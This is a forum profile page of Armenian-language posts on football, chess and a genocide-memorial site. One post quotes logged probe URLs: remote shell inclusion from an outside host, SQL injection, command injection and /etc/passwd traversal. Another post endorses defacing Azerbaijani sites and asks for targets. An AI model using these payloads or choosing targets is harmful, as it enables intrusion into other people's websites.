-
Posts
547 -
Joined
-
Last visited
Content Type
Events
Profiles
Forums
Gallery
Everything posted by Egern.net
-
Իսկ ազգային հավաքականը, չնայած կորուստներին և մյուս խնդիրներին, ստիպված պիտի լինի չպարտվել Բելգիային: Եթե անցած առաջնություններում մենք ունեինք նպատակ գոնե վերջին տեղը չլինելու, ապա այս անգամ պիտի գոնե հետ չմնանք հարևաններից:Եթե հարևանները գրավեն 2-րդ տեղը, մենք պիտի ստիպված գրավենք առաջին տեղը Ադրբեջանը արդեն ունի մի պարտություն, դրա համար մրցաշարային աղյուսակում մենք ավելի առաջ ենք Եթե Բելգիային պարտվենք առանց գոլ խփելու ու 0-1-ից մեծ հաշվով, հետ կընկնենք ու խայտառակ կլինենք: Նենց որ պիտի գոնե 1 գոլ խփենք (կամ էլ` 0-0): Հաշվի առեք, որ մեզ զուգահեռ ադրբեջանցիք խաղում են ղազախների հետ, որոնց հաղթելը պիտի որ դժվար չլինի...... Համենայն դեպս բուքմեյքերները ադրբեջանցիների հաղթանակը գնահատում են մոտ 1.5, իսկ ղաչախներինը` 5: Իսկ մենք ղազախների հետ խաղալու ենք հունիսի 2-ին, այսինքն` մինչև հունիսի 2-ը շատ հնարավոր է, որ կյանքներս ուտեն:
-
Տեսնեք, թե ինչ ահավոր վիճակ է մինչև 21 տարեկանների մեր խմբի մրցաշարային աղյուսակում. Բոսնիա - 1 խաղ - 3 միավոր - գոլեր` 3-2 Հայաստան - 2 խաղ - 3 միավոր - գոլեր` 3-3 Նորվեգիա - 1 խաղ - 0 միավոր - գոլեր` 0-1 Ամսի 6-ին խաղում են Նորվեգիան և Բոսնիան (Նորվեգիայի դաշտում): Ամեն ինչ կախված է այս խաղից: Իրավիճակը չափազանց խճճված է: Նախ նշեմ, որ հավասար միավորների դեպքում հաշվի են առնվում հետևյալ գործոնները. 1. Խփած ու բաց թողած գոլերի տարբերությունը 2. Խփած գոլերի քանակը 3. Արտաքին դաշտում խփած գոլերի քանակը և այլն... (մյուս գործոնները չեմ հասկանում ) Եթե Նորվեգիան պարտվի կամ ոչ-ոքի անի, մենք դուրս ենք մնում, քանի որ Բոսնիան ունենում է 4 միավոր, իսկ մենք` 3: Եթե Նորվեգիան հաղթի 1-0, ապա կստացվի Հ - 2 - 3 - 3-3 Բ - 2 - 3 - 3-3 Ն - 2 - 3 - 1-1 Առաջին տեղ դուրս կգա Հայաստանը (3-րդ գործոն), քանի որ Բոսնիայի հետ խաղում Բոսնիայի դաշտում 2 գոլ է խփել, իսկ Բոսնիան` արտաքին դաշտում 0 (Նորվեգիայի հետ) Եթե Նորվեգիան հաղթի 2-0 հաշվով, ապա` Ն - 2 - 3 - 2-1 Հ - 2 - 3 - 3-3 Բ - 2 - 3 - 3-4 Նորվեգիան դուրս կգա առաջին տեղ (1-ին գործոն), քանի որ կունենա գոլերի լավագույն տարբերությունը (+1, Հայաստանի 0-ի և Բոսնիայի -1-ի դիմաց): Նույնը վերաբերում է այն դեպքերին, եթե Նորվեգիան հաղթի 3-0, 4-0 և այլն: Իսկ եթե Նորվեգիան հաղթի 2-1 հաշվով, ապա` Հ - 2 - 3 - 3-3 Ն - 2 - 3 - 2-2 Բ - 2 - 3 - 4-4 Առաջինը նորից Հայաստանն է (3-րդ գործոն), քանի որ նորից մրցակցի դաշտում խփել է 2 գոլ (Բոսնիա` 1, Նորվեգիա` 0) 3-2 հաշվի դեպքում չգիտեմ ինչ կլինի... Հ - 2 - 3 - 3-3 Ն - 2 - 3 - 3-3 Բ - 2 - 3 - 5-5 Հայաստանն էլ, Բոսնիան էլ կունենան արտաքին դաշտում խփած 2 գոլ: Չգիտեմ ինչ կլինի, քանի որ հաշվարկի 4-րդ գործոնը չեմ հասկանում. կապված է ինչ-որ գործակիցների հետ (http://www.uefa.com/competitions/under21/Format/index.html) Եվ այլն, և այլն....... Սպասենք խաղին: Մեզ պետք է կամ` 1-0, կամ` 2-1:
-
Կա 5 տարբերակ: Դրանց տեքստերը կարող եք գտնել մի շարք ինտերնետային էջերում: Այդ թվում`Ազգ օրաթերթի սայթում` http://www.azg.am/?lang=AR&num=2006083016 Ինչքան գիտեմ, այդ հիմնի ընտրության մրցութային հանձնաժողովի սայթն է www.mrcuyt.am Երեկ բոլոր տարբերակները կատարվեցին Ֆիլհարմոնիայի դահլիճում ու ցուցադրվեցին Հ1-ով:
-
Մի քանի տառասխալներ, Arm-ka ջան Մինջև - ի փոխարեն մինչև իրավնուք - ի վոխարեն իրավունք Հետո, ինչքան գիտեմ, համաձայնված չեն ասում, ավելի լավ բառ կլինի: Մեկ էլ կոնֆերանս-ի իմաստը չհասկացա, էդ նույն ֆորումն ա...?
-
Բայց տեսնո՞ւմ եք չէ, մեր ամենազարգացած սպորտաձևի շուրջ միայն մի սայթ կա` մեր շախմատային ֆեդերացիայի պաշտոնական սայթը, մեկ էլ երևի armchessschool.am-ը: Իսկ ասենք Թուրինի օլիմպիադայի ոսկե մեդալակիրները մի հատ գոնե ձևական էջ չունեցան: Չջղայնանանք ու ֆորումով մի հատ միացյալ ուժերով.....
-
Հայեր, տեսե՞լ եք Արոնյանի պարտիաները: Մտեք www.armchess.am, այնտեղ խաղերի լինկերը կան: Նայելու համար պետք է FLASH Player: Զուգահեռ կան նաև արագ շախմատի առաջնության Անանդ-Ռաջաբով (Ադրբեջան) խաղերը, որոնցում Անանդը ընդհանուր հաշվով հաղթել է: Այս տարի բացի գլխավոր Արոնյան-Սվիդլեր մրցախաղից կայացավ նաև այսպես ասած «ընտրական մրցաշար», որտեղ հաղթող ճանաչվեց ֆրանսիացի Էթիեն Բաքրոն (հիշեցնեմ, որ Արոնյանը Բաքրոյին հաղթում է 12 տարեկանից սկսած....): Այսինքն, հաջորդ տարի Մայնց960 մրցաշարի հիմնական մրցախաղում մրցելու են Արոնյանն ու Բաքրոն
-
41 Բայց ես հանելուկ չունեմ, նորից Դուք տվեք...
-
Հայեր ջան, պատմեմ մի շաաատ հետաքրքիր դեպք: Ուրեմն, մեր սայթը (www.egern.net) Հայոց Ցեղասպանության մասին ա: Ու մեր սայթում ես մի հատ counter եմ դրել Google Analytics-ից: Էդ ամեն պետքական-անպետք բան ցույց ա տալիս, այդ թվում, թե սայթի որ էջերն են մտել մեր visitor-ները: Այսօր նայեցի, տեսնեմ մտել են մի շարք էջեր, որոնք իրականում գոյություն չունեն, ու հետևաբար մեր սայթը պիտի ցույց տար Error404: File not found. Հիմա ներկայացնում եմ էդ գոյություն չունեցող լինկերի ոչ լրիվ ցանկը. (բոլորի սկիզբը` http://www.egern.net/) /?view=article&aID=http://hrs-xss.narod.ru/shell'>http://hrs-xss.narod.ru/shell /?view=article&aID=wqewqeqweqewq /?view=article&aID=|id; /?view=articles&aID=-2+union+select+null/* /?view=articles&aID=2+union+select+null/* /?view=ewrwe&year=sh.php&dir=http://hrs-xss.narod.ru/ /?view=passwd&aID=2&dir=/etc/ /?view=passwd&content=/etc/ /?view=passwd&dir=/etc/ /?view=spring&year=0&dir=/etc /?view=spring&year=06&page=2' /?view=spring&year=06&page=|id; /?view=summer&year=05'&dir=/etc/ /?view=summer&year=passwd&dir=../etc/passwd /?view=summer&year=passwd&dir=/etc/ /?view=summer&year=shell.php&dir=http://hrs-xss.narod.ru/ Ով որ PHP-ի հետ մի քիչ շփվել ա, միանգամից կնկատի, որ էս բոլոր լինկերը սայթում թերություն (bug) գտնելու փորձեր են: Օրինակ ցանկում գրված երկրորդ լինկը MySQL-ի error ստանալու անհաջող փորձ ա, քանի որ մեր սայթում MySQL չկա: Իսկ օրինակ վերջինը փորձում ա dir արգումենտի միջոցով shell գցել սայթի մեջ, բայց քանի որ մեր գրած PHP սկրիպտները լրացուցիչ արգումենտներ չեն «հասկանում», ապա դա էլ անհաջող փորձ ա: Եվ այլն... Ստացվում ա, որ մեկը (կամ մի քանիսը) փորձում են «ճեղք» գտնել սայթի մեջ, որ քանդեն: Բայց առայժմ չի հաջողվում: Հիմա առաջանում ա հարց. իսկ ով ա էդ փորձողը.... Ուրեմն Google Analytics-ը հնարավորություն ա տալիս տարբեր ստատիստիկաների հատվածները «խաչել» իրար հետ, որպեսզի իմանաս, թե, օրինակ, Internet Explorer-ով մտնող visitor-ները ինչ screen resolution ունեն և այլն և այլն: Այ այս ֆունկցիայի միջոցով ես վերոնշյալ լինկերից մեկը խաչեցի մի շարք ստատիստիկաների հետ: Ուրեմն բերեց. Page: "/?view=summer&year=passwd&dir=/etc/" City: Baku Network Location: BakTelecom Browser: Internet Explorer 6.0 Platform: Microsoft Windows XP Այ թե ինչ.... Ուրեմն ադրբեջանցիները փորձում են քանդել Եղեռնին վերաբերվող սայթը: Բայց չի ստացվում, համենայն դեպս առայժմ (չնայած գրեթե վստահ եմ, որ այդպես էլ ոչ մի թերություն չեն հայտնաբերի, իսկ մեր սերվերը շատ պաշտպանված ա)........... P>S> Հարգելի մոդերատորներ, եթե այս թեման այնքան էլ ճիշտ տեղում չի սարքված, խնդրում եմ տեղափոխել
-
Ես արդեն մի ամսից ավել է օգտագործում եմ ու շատ գոհ եմ: Ի տարբերություն նախորդ վերսիաների, սա բացում է նաև նկարներ.... Դառնում է media center !!!! Միայն թե մի փոքր ավելի ծանր է...
-
Իմ կարծիքով, ամենահարմարը Google-ի WIKIMAPIA պրոյեկտն է, որը շաաաատ մոտիկից ցույց է տալիս ամեն-ինչ: Մտեք www.wikimapia.org : Բայց մի թերություն ունի, եթե քաղաքի տեղը չգիտես, գործնականում չես կարող գտնել այն...
-
Շնորհավորում եմ բոլորիս այս փայլուն հաղթանակի կապակցությամբ: Մենք, իրոք, ամենաուժեղն ենք: Մեր հարևանների բերանը երկար ժամանակով փակվեց... Այսօր շատ հետաքրքիր ստացվեց ինձ համար: Խաղերը ինչ-որ անսովոր շուտ ավարտվեցին (մերոնք դե գիտեին, որ ոչ-ոքին արդեն ոսկի է): Ինչպես երևի գիտեք, առաջնության խաղերը կարելի էր դիտել օլիմպիադայի պաշտոնական կայքում: Ես չէի հասկանում ինչու, բայց չէի կարողանում նայել: Ես ունեի Java Runtime Environment, որով հաջողությամբ հետևել էի Լինարեսի, Մոնակոյի և այլ խաղերին: Այսօր առավոտյան, պատահաբար, ընկերոջս տանը մտա օլիմպիադայի կայքը և տեսա, որ երեկա խաղերը կան: Պարզվեց, որ նայելու համար պետք էր Microsoft Virtual Machine 5-ը: Ընկերս դա ուներ CDի վրա և տվեց ինձ: Եկա տուն, ժամը 1-ն էր: Հաց կերա և այլն, 1:45 որոշեցի նայեմ, թե ինչպես են ընթանում խաղերը: Install արեցի MsVM-ը, մտա ինտերնետ, տեսնեմ` հաշիվը` 2-2: Մտածեցի, որ սխալմամբ երեկվա հաշիվն են դրել, բայց հետո խաղատախտակներին նայեցի ու պարզ դարձավ, որ մեկը 7, մյուսը 10, մեկ ուրիշը 15 քայլից համաձայնվել են ոչ-ոքիի: Հետո մի տեղ գտա 12-րդ տուրի մրցաշարային աղյուսակը ու հասկացա, թե ինչու էին այդքան շուտ վերջացրել... Ամեն դեպքում, բոլորս գոհ ենք մերոնցից ու հպարտ: Ներկայացնում եմ մրցաշարային աղյուսակը. Rk. SNo Team Games + = - TB1 TB2 TB3 1 3 Armenia 13 10 3 0 36 397 23 2 12 China 13 8 1 4 34 393 17 3 7 USA 13 9 3 1 33 392.5 21 4 6 Israel 13 9 3 1 33 380.5 21 5 16 Hungary 13 7 4 2 32.5 386.5 18 6 1 Russia 13 7 2 4 32 410.5 16 7 5 France 13 7 5 1 32 396 19 8 4 Ukraine 13 8 2 3 32 390.5 18 9 10 Bulgaria 13 7 2 4 32 385 16 10 11 Spain 13 7 4 2 32 377.5 18 11 20 Czech 13 7 4 2 31 399 18 12 8 Holland 13 8 1 4 31 396 17 13 30 Uzbekistan 13 6 4 3 31 389.5 16 14 17 Georgia 13 9 2 2 31 388 20 15 14 Germany 13 7 0 6 31 381 14 16 18 Cuba 13 7 3 3 30.5 386 17 17 31 Sweden 13 6 4 3 30.5 381 16 18 23 Moldova 13 7 1 5 30.5 376.5 15 19 13 England 13 8 2 3 30.5 366 18 20 25 Denmark 13 8 2 3 30 396 18 21 21 Poland 13 7 1 5 30 381 15 22 22 Greece 13 7 2 4 30 379 16 23 32 Slovenia 13 8 2 3 30 378.5 18 24 9 Azerbaijan 13 7 2 4 30 377.5 16 25 28 Croatia 13 6 3 4 30 373.5 15
-
WE WILL NEVER FORGET! WE WILL NEVER FORGIVE!
-
Ճիշտն ասած լավ չհասկացա: Դա իրոք լռության րոպե՞ է լինելու: Այսինքն, ոչինչով չի արտահայտվելու ֆորումում... Ամեն դեպքում համաձայն եմ:
-
Որ շատ խնդրեմ, այդ էջում չեք տեղադրի մեր կայքի հասցեն էլ... Կարող եք մտնել, նայել www.egern.net: Վատը չի: Եթե հնարավոր է, դրեք էլի էդ հասցեն ցեղասպանությանը նվիրած կայքերի ցանկում....
-
Անվերապահորեն միանում եմ այս նախաձեռնությանը եւ կոչ եմ անում ԲՈԼՈՐԻՆ նույնպես միանալ: Մենք ամեն ինչ պիտի անենք, որ վառ պահենք այն 1.5 միլիոնի հիշատակը...
-
Ազատություն ռ/կ-ն հաղորդեց, որ երեկ PBS-ը ցուցադրել է ցեղասպանության մասին ֆիլմը: Իսկ ահա դրա Լոս Անջելեսի մասնաճյուղը հրաժարվել է ցուցադրել հենց այդ ֆիլմը եւ փոխարենը ցուցադրել է նման ֆրանսիական արտադրության մի ֆիլմ` ավելի մեղմ շեշտադրումներով:
-
Մկրատն ու «չերեզ սիբյա»-ն տարբեր բաներ են` համենայն դեպս մեր խոսակցականում: Մկրատ է համարվում այն հարվածը, որը խփվել է կամ մեջքով կամ նույնիսկ կողքով դեպի դարպասը, ԲԱՅՑ խփող ոտքից առաջ բարձրացնելով մյուս ոտքը: Իսկ չերեզ սիբյա-ն դա այն է, երբ ֆուտբոլիստը կանգնած է մեջքով դարպասին եւ մի ոտքը բարձրացնելով գնդակը դարպասն է ուղարկում իր իսկ գլխավերեւով: Մի ուղղում. ոչ թե դատավոր, այլ մրցավար
-
Հայեր ջան, Նախամաշտոցյան հայ գիր եւ գրականություն ամենայն հավանականությամբ եղել է: Դա են վկայում ինչպես Խորենացու, այնպես էլ Կորյունի հիշատակումները: Բայց, քանզի փաստեր չկան, չի կարելի վստահ ինչ որ բան ասել: Չի կարելի ամեն մի հույն հեղինակի գրածը ընդունել որպես գիտական վերլուծության հիմք: Մինչեւ որեւէ «գիրք» չհայնաբերվիու չհաստատվի, որ դա հայկական է, այսպիս խոսակցությունները անիմաստ են:
-
Ինձ էլ է այդպես թվում: Այնքան եմ ուզում տեսնել, թե ինչպես է այն աշխատում... Ման եմ գալիս VivaCell-ի Կլասիկ բաժանորդ...
-
Ես էլ եմ շնորհավորում.... Մյուս անգամ այդ կողմերով անցնելուց մի լավ կնայեմ Ձեր նոր շենքը....
-
Войну переносят в Интернет - азверелые вандалы в интернете
Egern.net replied to Vigen's topic in Software and Hardware
Հայեր ջան, նախ եւ առաջ, պետք է այնպես սարքել սայթերը, որ քանդել չլինի պարզապես: Դուռդ փակ պահիր, հարեւանիդ գող մի ասա: Այ, օրինակ, թեկուզ հենց մեր սայթը: Խիստ, շատ խիստ կասկածում եմ, թե մեկը կկարողանա այն քանդել: Որովհետեւ այն, առաջին հերթին, լավ պաշտպանված սերվերի վրա է, նաեւ` մեր սկրիպտերը թերություններ չունեն: Իհարկե, եթե սայթում կա ֆորում, ապա դժվար թե որեւէ թերություն չլինի, բայց, եթե սերվերը լավն է, ապա գրեթե հարց չկա: Բայց, ես էլ կողմ եմ ադրբեջանական սայթերի քանդելուն: Ես մի հատ «կիսախակեր» ընկեր ունեմ, միգուցե եւ համոզեմ, մի բան անի (եթե կարողանա): Ինձ կարո՞ղ եք ասել մի քանի սայթեր (ադրբեջանական), որոնք պետք լինի ...ել: -
Почтовый ящик Gmail и другие сервисы Google
Egern.net replied to Lazar's topic in Software and Hardware
Շատ ցավալի է.... ես, իհարկե, մի ամիս առաջ այդտեղ ասել եմ, որ ինձ ուղարկեն... բայց..... Ես հույս ունեի, որ GoogleMail ունեցողը կարող է նաեւ analytics-ից օգտվել.... -
Почтовый ящик Gmail и другие сервисы Google
Egern.net replied to Lazar's topic in Software and Hardware
Հասկանու՞մ եք, այդ լինկով ես գրացվել եմ GMAILով, բայց ինձ պետք է իմանալ invitation code-ը այլ ծառայություններից (Google Analytics) օգտվելու համար...... -
IX տուրում Արոնյանը կույր շախմատով պարտվեց, իսկ արագով` հաղթեց Գելֆանդին: Այժմ 9-10-րդ տեղերում է